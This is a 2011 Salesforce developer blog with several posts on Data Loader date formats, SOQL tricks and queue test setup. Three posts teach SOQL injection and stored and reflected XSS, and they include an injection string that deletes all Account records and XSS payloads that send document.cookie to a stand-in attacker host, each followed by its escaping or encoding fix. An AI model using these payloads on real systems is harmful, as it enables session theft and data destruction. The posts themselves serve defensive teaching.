Powered By Blogger

Wednesday 31 August 2011

Date format while uploading data in salesforce

I am back to text my knowledge to share with world.
These days I was much involved in data loading part and here I was doing a minor mistake, but each time this minor mistake forced me to re-import .

In Apex data loader setting we have a check box  "Use European date format(dd/mm/yyyy)", true value for this checkbox allowed you to insert the date in dd/mm/yyyy format.

Now may be you are thinking that what is new here and what is the need to write a blog on this as this looks very common.

Now the picture starts from here :
As you have marked the checkbox as true and you are planning to insert the date in the same format, but by mistake date is still in MM/DD/YYYY format in your csv file.

What will happen now? any guess?
Will data loader insert these records or it's going to throw an error.
and if the record inserted, will date filed be populated ?

No more questions o/w people will leave this topic :P.

So here is the answer :
Data loader will not throw any error, it will insert the date in date field, but date field value will be distorted.

So here is the example:
Suppose I have this setting checked in my Apex Data Loader.
My csv file has a date field with value: 01/23/2011 (MM/DD/YYYY)

Now I started data load operation and date will be inserted as 01/11/2012.

Explanation: As data loader is expecting the date in dd/mm/yyyy format while we provided in 01/23/2011 (MM/DD/YYYY) and  23 cannot be a month value, so 23 considered as 1 year and 11 months.
So the result will be 01/11/2012.

Now here you can see data loader is not going to block any record because of this format so you will have to be very careful with this. It's your responsibility to check the data loader setting and date format in csv file.

Please correct me if anything I am making wrong here. comments are welcome.















Saturday 7 May 2011

Salesforce: Play Attachments on the same page

I came back again with a very interesting thing this time.
These day I worked a lot with the attachments and realized that if we have any audio/video attachments in org then to see them first we need to download it on local machine and only then we can play with it.

I wanted to build a script which can  play attachment in the salesforce itself without asking for download.

Now the question is how this is useful :
I had a voice call with the customer and attached this call with the customer record. Now after some days I want to confirm a point was discussed in the call. So what I need to do :

  • Go to the customer record.
  • Click on the attachment.
  • Download the attachment.
  • Save on local disk.
  • Play audio.
  • Delete file once audio done to escape from the unnecessary storage on machine.

So here you can see that, there will be 6 step to listen a audio file, while we just wanted to hear the discussion again. These step will be always be repeated whenever we want to listen this conversation.

So if there could be a utility which could play the files in org itself without asking for downloading, that would be better. That's whay I started work on this idea and now here I am.
I have created a visualforce page and embedded this with some JS files, which allow to play the audio files on the same screen. This shows a player only with the audio file in the same row. Check it here:
http://enable-portal-developer-edition.na8.force.com/apex/PlayMP3?id=00QC000001Oqr4J


This page can be added as inline Visualforce page with any object which supports attachments.Like :





I have created a Un-managed package for this. So you can modify this as per your requirement.
Here is the URL:
https://login.salesforce.com/?startURL=%2Fpackaging%2FinstallPackage.apexp%3Fp0%3D04tC0000000YZvS

Please comment if any modification can be done to make it better.

Regards,
Bhawani

Friday 15 April 2011

Tricks : Comparing two fields in a SOQL query



Sorry for being Inactive from a long :).
Actually these days I am looking for that what is not possible in salesforce and what can be the work around for that.

So be ready I am going to post some interesting  things in coming days :).

Are you ready to get the first one, so let's start

I have an object named "Filed Comparision" with fields "Start Date" and "End Date".
Now picture starts from here :
My requirement is to get all the records from the "Field Comparison" having End Date greater then Start Date.

So my query should be something like :

List<Field_Comparison__c> listResults = [Select Name from Field_Comparison__c where End_date__c > Start_Date__c];

but unfortunately, due to some salesforce restriction we can not do field comparison in where clause.This throws an exception "Compile Error: line 1, column 98: unexpected token: 'Start_Date__c'".

Then what should be done? do we need to fetch all the records and do the coding stuffs for getting the results?
Absolutely not.

We can create a formula field with criteria :
IF(End_Date__c > Start_Date__c , 'true', 'false') 

Guess, Formula field name is "Is Active". After introducing this field, records will be looks like :





I hope , now you got the idea what I am going to do to get the valid records only :D.

So, to get all the valid records SOQL query can be :

 List<Field_Comparison__c> listResults = [Select Name from Field_Comparison__c where Is_Active__c = 'true'];

Ohh..........It's completed. forgive me for getting you bored :P.



Please comments for making it for meaningful and more helpful.






Monday 14 March 2011

Salesforce applications with security: SOQL Injection

Hi,

I am again here to share something with you that may be you know, but still I would like to rate myself :).
So please be ready for my one more boring(don't think so) topic "Salesforce applications with security: SOQL Injection".

This time SOQL injection. So SOQL is a type of vaccine for human body, injects when you really feels weak(Sorry :), No more joke).

 It's  a code injection technique that exploits a Security vulnerability.
Let me be more specific, Suppose you have a search form and instead of typing a valid search parameter, User types something invalid text  and that can make your SOQL query invalid and expose the unexpected result.
This situation occurs when user input is not filtered for escape characters.
 let's have a pictorial look :



It's a SQL example , but describe the SOQL injection as well in a good manner.
So here you can see that. In the User id field once user puts a invalid parameter and goes to the controller and form a query that  results in a invalid login.

The worst scenario could be if resultant data from a query supposed to be deleted.
 let's have one more quick example for this :

I have a case where I want to delete the Account based on name entered in the input name field on page.
Implementation can be like this :

List<Account> listAccount = Database.query('Select id from Account where Name = \'' + nameField + '\' ');

delete listAccount;

It works great with a valid value.
 Now it can be worst if value of nameField is provided like :

nameField = \' OR Id != null OR Type != \'


So once the action will be performed, this will be bind-up with the query and resultant query will be like this :
 

List<Account> listAccount = Database.query('Select id from Account where Name = \'\'\' OR ID != null OR Type != \'\' ');

delete  listAccount;

So hopefully , you can see the monster  here. It will delete the entire database for account records.

Salesforce provides escape functions to get rid from SOQL injection.
Solution can be one of the followings:
  1. Try to use STATIC queries as much as possible. STATIC query has inbuilt escaping.
  2. If dynamic query is needed , then all the search parameters should use escapeSingleQuotes() function.like
    List<Account> listAccount = Database.query('Select id from Account where Name = \'' + String.escapeSingleQuotes(nameField) + '\' ');
String.escapeSingleQuotes method adds the escape character (\) to all single quotation marks in a string that is passed in from a user. The method ensures that all single quotation marks are treated as enclosing strings, instead of database commands. 

I hope, this post helps you to get a basic understanding of SOQL injection.

Now I am going to finish this, as If I didn't you guys will gone sleep.
So topic ends, party time ....................



Will be back very soon with something new :).


 




Tuesday 1 March 2011

Salesforce applications with security : Stored XSS

Continuing to my previous post , this time I would to share the knowledge on Stored XSS part.
So Stored XSS is cross site scripting where a attacker can inject his code on to the server pages permanently and these scripts run whenever some action made on the page.

In other words :
"Stored attacks are those where the injected code is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information."

Let's have an example:
<apex:page>

<script>
function crossXSS()
{
var xssExample = '{!Account.Name}' ;
}
</script>
<apex:form>
<apex:commandLink value="Click me" onClick="crossXSS();" />
</apex:form>
</apex:page>

Now suppose
Account Name is :  testName';1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo=';

So this account name will always be on the page in script block and whenever the commandLink will be clicked "crossXSS" will be called and will be in the following manner:
var xssExample = 'testName';1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo=';

So again you can see here all the cookies will be sent to the attackers.com site.

What I suggested in previous blog , repeating all those things again :).

To prevent from this , salesforce provides some encoding function for the those are available on Visualforce page like :etc.
JSENCODE, HTMLENCODE, JSINHTNLENCODE, URLENCODE etc.

So the code explained above can be  updated as :
var xssExample = '{!JSENCODE(Account.Name})' ;

So the value fetching from the request parameter will be encoded now.
JSENCODE : To encode the properties in javascript.
HTMLENCODE: To encode the properties in javascript.
JSINHTNLENCODE: If calling a javascript method from HTML component and passing the properties.
URLENCODE:  If building a URL on page.

Please feel free to ask the questions/doubts. Suggestions are appreciated.














Saturday 26 February 2011

Queue not associated with this SObject type

Recently I experienced with a new exception , while I was creating a test class for one of mine functionality.
I looked for the solution on community and other places but couldn't find helpful.So I continued myself .

here is the case what I was looking for:
Create a lead whose owner should be a queue.

I started with this :
Group grp = new Group(Name='Queue',Type='Queue');
insert grp;
          
Lead lead = new Lead(LastName = 'testLastName',company='test', OwnerId = grp.Id);
insert lead;

but when I was running the class, result was with the exception :
System.DmlException: Insert failed. First exception on row 0; first error: INVALID_OPERATION, Queue not associated with this SObject type: []

Here is the solution to shoot this error:

There  is an object named "QueueSobject".
Represents the mapping between a queue Group and the sObject types associated with the queue, including custom objects.

So whenever you want to have a group as an owner for a record , QueueSObject should be there to mapped that record with Group.

like:

Group grp = new Group(Name='Queue',Type='Queue');
insert grp;

QueueSobject mappingObject = new QueueSobject(QueueId = grp.Id, SobjectType = 'Lead');
System.runAs(new User(Id = UserInfo.getUserId()))
{insert mappingObject;}
          
Lead lead = new Lead(LastName = 'testLastName',company='test', OwnerId = grp.Id);
insert lead;

So try this whenever you are in same kind of trouble.

Queries/comments are invited.















Dynamic Mass DML Functionalities

A very interesting thing is that Salesforce provides the existing classes for performing Mass DML functionalities i.e. Mass Edit, Mass Delete, Mass Update etc. with the concrete SObject . That means you should be able to type cast your Sobaject in to Concrete SObject and then you can perform the Mass DML operations on the result.
We suggest you to instead of doing SObject hard coded you can implement the whole functionality dynamically.
Choose you Object and then choose for filter criteria for searching and then perform the various operation on searched results.Through the salesforce metadata api you can describe the selected SObject and get all the related fields.
your selected criteria then pass to the controller and searched result will be displayed on the UI.
Provide a select all check box and then pass the selected records to the controller and then controller will find out the object name through the key prefix of selcted records ids. and then you can use DML operations to perform any type of action on records.

Queries are invited.

Saturday 19 February 2011

Salesforce applications with security : Reflected XSS

XSS is also known as cross site scripting.  XSS allows a attackers to inject his code in client script.This is a web application vulnerabilities which allows a attackers to bypass the sharing rules . By doing this he can expose the sensitive data, session cookies etc. also.

Now coming back to the reflected XSS, it impacts the page while page is getting load. Suppose I have a block of script and I want to execute a script on page load. This is known as Reflected XSS.

Let's have a close look:
Here is a page , in the script block we are fetching an Id Parameter
<apex:page>
<script>
var xssExample = '{!$CurrentPage.Parameters.id}' ;
</script>
</apex:page>

Now have a deep look:
Page is called as :
/apex/TestPage?id=idvalue';1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo=';

So when the page will be loaded it will be executed in following manner:
 var xssExample = '{!$CurrentPage.Parameters.id}' ;
putting the id value from the request parameter :
var xssExample = 'idvalue';1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo=';

So here you can see that all the cookies will be sent to the attackers.com site.

To prevent from this , salesforce provides some encoding function for the those are available on Visualforce page like :etc.
JSENCODE, HTMLENCODE, JSINHTNLENCODE, URLENCODE etc.

So the code explained above can be  updated as :
var xssExample = '{!JSENCODE($CurrentPage.Parameters.id})' ;

So the value fetching from the request parameter will be encoded now.
JSENCODE : To encode the properties in javascript.
HTMLENCODE: To encode the properties in javascript.
JSINHTNLENCODE: If calling a javascript method from HTML component and passing the properties.
URLENCODE:  If building a URL on page.

Please feel free to ask the questions/doubts. Suggestions are appreciated.